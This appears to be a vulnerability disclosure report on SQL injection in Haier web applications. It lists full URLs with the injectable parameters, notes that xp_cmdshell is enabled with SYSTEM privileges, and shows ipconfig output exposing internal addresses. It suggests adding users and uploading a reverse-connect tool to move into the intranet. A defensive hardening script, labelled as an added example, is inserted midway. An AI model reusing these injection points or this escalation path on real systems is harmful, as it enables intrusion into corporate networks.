
Injection on a Haier site with dba/system privileges; internal network penetration possible, threatening intranet security


http://gopurchase.haier.com/GOPurchase/Common/ConsultSupplyerBank.aspx?cId=inbankNo&cNm=inbankNm&strWhere=&selectType=0&selectIds=a" -p "strWhere"

strWhere parameter

The web front end and the database run on separate servers.

16H database server~~~

xp_cmdshell comes enabled by default on this thing.

(screenshot: QQ截图20151018220342.png)

system privileges: a user can be added and a reverse-connect tool uploaded to penetrate the internal network.
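A T-SQL audit and hardening script for the configuration the report describes (xp_cmdshell enabled, the application's login holding sysadmin, the service running as SYSTEM). This is an added example, not part of the original report; the login name gopurchase_app and the database name GOPurchase are hypothetical placeholders.

```sql
-- Added example (not from the original report). Assumed names:
--   login 'gopurchase_app' = the web application's SQL login (hypothetical)
--   database 'GOPurchase'  = the application's database (hypothetical),
--   with a database user of the same name already mapped to the login.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means any sysadmin login
--    can run OS commands under the SQL Server service account.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Which account runs the service? If it is LocalSystem, every
--    xp_cmdshell call executes as NT AUTHORITY\SYSTEM, which is what
--    "system privileges" in the report means in practice.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 3. Which logins hold sysadmin? The web application's login should
--    never appear in this list; if it does, an injection in the app
--    is an injection with full server control.
SELECT m.name AS member_login, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 4. Hardening: turn xp_cmdshell off (requires show advanced options)
--    and take the app login out of sysadmin, leaving it only the
--    database-level rights the application actually needs.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

EXEC sp_dropsrvrolemember 'gopurchase_app', 'sysadmin';
USE GOPurchase;
EXEC sp_addrolemember 'db_datareader', 'gopurchase_app';
EXEC sp_addrolemember 'db_datawriter', 'gopurchase_app';

-- 5. Re-check: xp_cmdshell should now report value_in_use = 0, and
--    the sysadmin query in step 3 should no longer list the app login.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Moving the service off LocalSystem to a low-privilege account is done in SQL Server Configuration Manager rather than T-SQL, and is what stops the remaining sysadmin logins from reaching SYSTEM even if xp_cmdshell is re-enabled later.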

Code block:
command standard output:
---
Windows IP Configuration

Ethernet adapter 本地连接 5:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.135.106.44
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.135.106.1

Ethernet adapter 本地连接 2:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.11.178.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
---

Code block: (netstat output of the database server's listening ports and connections; raw dump omitted)

From here you can do whatever you want~!

Proof of vulnerability:

As above.

As a bonus, another SQL injection:

http://idea.haier.com//mas/front/live/mao?method=list&search=1001&sField=1&sOpr=like&sWord=1

sField parameter

(screenshot: QQ截图20151026014849.png)

Fix recommendation:

Ops folks, put in a bit more effort~
